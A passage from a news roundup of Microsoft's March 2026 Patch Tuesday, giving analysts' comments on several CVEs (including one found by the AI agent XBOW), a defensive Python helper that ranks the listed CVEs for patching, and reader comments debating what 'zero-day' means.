“This isn’t just any elevation of privilege vulnerability, either; the advisory notes that an authorized attacker can elevate privileges to sysadmin over a network,” Rapid7’s Adam Barnett said. “The CVSS v3 base score of 8.8 is just below the threshold for critical severity, since low-level privileges are required. It would be a courageous defender who shrugged and deferred the patches for this one.”
The other publicly disclosed flaw is [CVE-2026-26127](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26127), a vulnerability in applications running on .NET. Barnett said the immediate impact of exploitation is likely limited to denial of service by triggering a crash, with the potential for other types of attacks during a service reboot.
It would hardly be a proper Patch Tuesday without at least one critical Microsoft Office exploit, and this month doesn’t disappoint. [CVE-2026-26113](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26113) and [CVE-2026-26110](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26110) are both remote code execution flaws that can be triggered just by viewing a booby-trapped message in the Preview Pane.
Satnam Narang at Tenable notes that just over half (55%) of all Patch Tuesday CVEs this month are privilege escalation bugs, and of those, a half dozen were rated “exploitation more likely” — across Windows Graphics Component, Windows Accessibility Infrastructure, Windows Kernel, Windows SMB Server and Winlogon. These include:
–[CVE-2026-24291](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24291): Incorrect permission assignments within the Windows Accessibility Infrastructure to reach SYSTEM (CVSS 7.8)
–[CVE-2026-24294](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24294): Improper authentication in the core SMB component (CVSS 7.8)
–[CVE-2026-24289](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-24289): High-severity memory corruption and race condition flaw (CVSS 7.8)
–[CVE-2026-25187](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-25187): Winlogon process weakness discovered by Google Project Zero (CVSS 7.8).
Ben McCarthy, lead cyber security engineer at Immersive, called attention to [CVE-2026-21536](https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-21536), a critical remote code execution bug in a component called the Microsoft Devices Pricing Program. Microsoft has already resolved the issue on their end, and fixing it requires no action on the part of Windows users. But McCarthy says it’s notable as one of the first vulnerabilities identified by an AI agent and officially recognized with a CVE attributed to the Windows operating system. It was discovered by XBOW, a fully autonomous AI penetration testing agent.
XBOW has consistently ranked at or near the top of the Hacker One bug bounty leaderboard for the past year. McCarthy said CVE-2026-21536 demonstrates how AI agents can identify critical 9.8-rated vulnerabilities without access to source code.
“Although Microsoft has already patched and mitigated the vulnerability, it highlights a shift toward AI-driven discovery of complex vulnerabilities at increasing speed,” McCarthy said. “This development suggests AI-assisted vulnerability research will play a growing role in the security landscape.”
Microsoft earlier provided patches to address nine browser vulnerabilities, which are not included in the Patch Tuesday count above. In addition, Microsoft issued a crucial out-of-band (emergency) [update on March 2](https://support.microsoft.com/en-us/topic/march-2-2026-kb5082314-os-build-20348-4776-out-of-band-606518e5-28d2-4ebe-be25-26287e2fc703) for Windows Server 2022 to address a certificate renewal issue with passwordless authentication technology Windows Hello for Business.
Separately, Adobe shipped updates to fix 80 vulnerabilities — some of them critical in severity — in [a variety of products](https://helpx.adobe.com/security/Home.html), including Acrobat and Adobe Commerce. Mozilla Firefox v. 148.0.2 resolves three high severity CVEs.
For a complete breakdown of all the patches Microsoft released today, check out the SANS Internet Storm Center’s [Patch Tuesday post](https://isc.sans.edu/forums/diary/Microsoft%20Patch%20Tuesday%20March%202026/32782/). Windows enterprise admins who wish to stay abreast of any news about problematic updates, [AskWoody.com](https://www.askwoody.com) is always worth a visit. Please feel free to drop a comment below if you experience any issues applying this month’s patches.
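As an added example, not code from Microsoft, Rapid7, Tenable, Immersive or this article: a small Python triage helper that records this month’s CVEs exactly as the roundup above describes them and orders them by the signals the quoted analysts lean on (active exploitation, public disclosure, a critical rating, a zero-click trigger such as the Preview Pane, “exploitation more likely”, then CVSS). It also encodes the two readings of “zero-day” that the comments below argue over, the broad one (publicly disclosed or exploited while unpatched) and the strict one (unpatched and actively exploited), so the difference is a one-line check rather than a debate. The tier ladder and its cutoffs are this example’s own assumptions; CVSS values and flags are transcribed from the article, and a score is left as `None` where the article quotes none.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Cve:
    cve_id: str
    component: str
    impact: str                          # "RCE", "EoP" or "DoS"
    cvss: Optional[float] = None         # None where the article quotes no score
    severity: Optional[str] = None       # "Critical" where the article says so
    publicly_disclosed: bool = False
    exploited_in_wild: bool = False
    exploitation_more_likely: bool = False
    zero_click: bool = False             # fires on rendering, e.g. the Preview Pane
    patch_available: bool = True
    customer_action_required: bool = True


def is_zero_day_broad(c: Cve) -> bool:
    """Broad usage (as relayed from Microsoft in the comments): disclosed or exploited while unpatched."""
    return not c.patch_available and (c.publicly_disclosed or c.exploited_in_wild)


def is_zero_day_strict(c: Cve) -> bool:
    """Strict reading: unpatched AND actively exploited."""
    return not c.patch_available and c.exploited_in_wild


def triage_tier(c: Cve) -> int:
    """0 = patch today, 1 = this week, 2 = this cycle, 3 = routine, 9 = nothing to deploy.
    This ladder is the example's assumption, not Microsoft's or any vendor's guidance."""
    if not c.customer_action_required:
        return 9
    if c.exploited_in_wild:
        return 0
    if c.publicly_disclosed or c.severity == "Critical" or (c.impact == "RCE" and c.zero_click):
        return 1
    if c.exploitation_more_likely:
        return 2
    return 3


def prioritize(cves):
    """Order by tier, then higher CVSS first (unknown scores sort last within a tier), then CVE id."""
    return sorted(cves, key=lambda c: (triage_tier(c),
                                       -(c.cvss if c.cvss is not None else 0.0),
                                       c.cve_id))


# Transcribed from the article above; flags the article does not state keep their defaults.
MARCH_2026 = [
    Cve("CVE-2026-21262", "SQL Server 2016 and later", "EoP", 8.8, publicly_disclosed=True),
    Cve("CVE-2026-26127", ".NET applications", "DoS", publicly_disclosed=True),
    Cve("CVE-2026-26113", "Microsoft Office", "RCE", severity="Critical", zero_click=True),
    Cve("CVE-2026-26110", "Microsoft Office", "RCE", severity="Critical", zero_click=True),
    Cve("CVE-2026-24291", "Windows Accessibility Infrastructure", "EoP", 7.8, exploitation_more_likely=True),
    Cve("CVE-2026-24294", "Windows SMB Server", "EoP", 7.8, exploitation_more_likely=True),
    Cve("CVE-2026-24289", "Windows (component not named above)", "EoP", 7.8, exploitation_more_likely=True),
    Cve("CVE-2026-25187", "Winlogon", "EoP", 7.8, exploitation_more_likely=True),
    Cve("CVE-2026-21536", "Microsoft Devices Pricing Program", "RCE", 9.8, severity="Critical",
        customer_action_required=False),   # fixed server-side; nothing for admins to deploy
]


if __name__ == "__main__":
    for c in prioritize(MARCH_2026):
        print(f"tier {triage_tier(c)}  {c.cve_id}  {c.component}  cvss={c.cvss}")
```

Run as-is it puts the SQL Server bug first (publicly disclosed, 8.8, sysadmin over the network), the two Office Preview Pane bugs and the .NET crash in the same tier, the four “exploitation more likely” privilege escalations next, and the XBOW-found CVE at the bottom because there is nothing to deploy for it. Swap in your own weighting if your estate has no SQL Server or no Outlook; the point is that the ordering is explicit and reviewable rather than argued from headlines.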
Contrary to this article, updates this month contain fixes for at least two publicly acknowledged zero days.
Really? Which two? IDK how you define zero-day, but for me it’s an unpatched and actively exploited vulnerability. As mentioned in the story, there were two flaws fixed this month that were previously disclosed publicly. I believe in both cases there was not even sample exploit code involved.
I’m just going off every other news outlet reporting. Bleeping computer, for example, stated “This month’s Patch Tuesday fixes two publicly disclosed zero-day vulnerabilities, with none of them known to be exploited in attacks. Microsoft classifies a zero-day flaw as publicly disclosed or actively exploited while no official fix is available.” ¯\_(ツ)_/¯
Okay. Thanks for pointing that out. I wonder why Microsoft would call it zero-day when they’re not aware of exploitation; doesn’t seem to suit their interests to do so. I’ve always believed that calling bugs 0day just because someone detailed a vulnerability (without providing examples of how to exploit them) publicly is unnecessarily alarmist. Real zero-days are a call for greater urgency, IMHO.
I think Microsoft likes to call them zero day when they feel the exploit is available even though nobody is currently using it. But then again maybe Microsoft knows something nobody else does? Is it one of those deals where it depends on who is releasing these security descriptors for the updates? One person calls them zero day the other something less dire? I saw the Bleeping Computer release too. They said the 2 zero-day ones were publicly disclosed. Not actively exploited. I guess sort of splitting hairs there.
That sounds pretty accurate. I think “zero-day” is defined and communicated differently throughout different organizations. Technically, a zero-day is any vulnerability that was unknown to the vendor before it became public. That doesn’t necessarily mean it’s being actively exploited. Microsoft uses “zero-day” as a broad label, then clarifies whether it’s actively exploited or just publicly disclosed. Other sources, like BleepingComputer, tend to separate those more clearly, which can make things less confusing. A publicly disclosed zero-day increases risk, but an actively exploited one is far more urgent since attackers are already using it in real-world attacks.
I don’t know if they know what they’re talking about, but Lifehacker reported there are two:
https://lifehacker.com/tech/microsoft-patch-tuesday-march-2026#:~:text=Two%20publicly%20disclosed%20zero%2Ddays%20for%20this%20Patch%20Tuesday
Looking for a patch for the chicken parm with panko and tagliatelle exploit. It’s two cascaded exploits, both leading to escalation followed by a ring three rk installation. 2021-2023/early 2024. Originating attacker from Ramat Gan.
Gnarly beach.
I had the same discussion with my coworker, who used CoPilot to summarize and the previously disclosed findings were included in the response because the patch is included in this month’s bundle. Strictly speaking anything previously published is no longer a “zero day” as far as I know, but its genesis stays with it.
I mean, any bug, prior to being disclosed, is at some point a ‘zero-day’ bug. AFAIK, it ceases being an 0-day the minute it is disclosed, yah?
Have they heard about two-factor authentication? They were obviously phished. Maybe put TFA in place now.
Lol at the roughy in your article! You criminal mastermind, Keir!